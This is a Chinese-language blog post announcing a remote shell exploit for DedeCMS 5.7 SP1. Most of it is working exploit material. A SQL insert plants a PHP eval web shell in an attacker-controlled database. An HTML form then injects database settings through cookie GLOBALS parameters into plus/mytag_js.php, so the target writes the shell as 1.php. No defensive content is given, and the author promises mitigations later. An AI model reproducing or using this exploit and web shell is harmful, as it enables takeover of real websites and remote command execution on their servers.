dedeCMS5.7SP1版2011年12月12号再曝漏洞可拿Shell EXP

不得不说声靠!dedeCMS又曝漏洞了。让这些钟爱dedeCMS建站的IT青年们情何以堪。据网传是要知道后台才能利用,实际上并不用,一位圈内好友称,只要 plus 目录存在,服务器能外连,就能拿shell。

前提条件是,必须准备好自己的dede数据库,然后插入数据:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen(“1.php”, \’a\’);@fwrite($fp, \'<?php eval($_POST[c]) ?>\’);echo “OK”;@fclose($fp);{/dede:php}’);

再用下面表单提交,shell 就在同目录下 1.php。原理自己研究,其实我也搞不懂…

<form action=”” method=”post” name=”QuickSearch” id=”QuickSearch” onsubmit=”addaction();”><input type=”text” value=”http://localhost:8080/plus/mytag_js.php?aid=1″ name=”doaction” style=”width:400″><br /><input type=”text” value=”dbhost” name=”_COOKIE[GLOBALS][cfg_dbhost]” style=”width:400″><br /><input type=”text” value=”dbuser” name=”_COOKIE[GLOBALS][cfg_dbuser]” style=”width:400″><br /><input type=”text” value=”dbpwd” name=”_COOKIE[GLOBALS][cfg_dbpwd]” style=”width:400″><br /><input type=”text” value=”dbname” name=”_COOKIE[GLOBALS][cfg_dbname]” style=”width:400″><br /><input type=”text” value=”dede_” name=”_COOKIE[GLOBALS][cfg_dbprefix]” style=”width:400″><br /><input type=”text” value=”true” name=”nocache” style=”width:400″><input type=”submit” value=”提交” name=”QuickSearchBtn”><br /></form><script>function addaction(){document.QuickSearch.action=document.QuickSearch.doaction.value;}</script>

暂时不知道官方什么时候出补丁,防范的方法稍后更新!敬请关注

Published by

小车

网站技术工人

3 thoughts on “dedeCMS5.7SP1版2011年12月12号再曝漏洞可拿Shell EXP”

Comments are closed.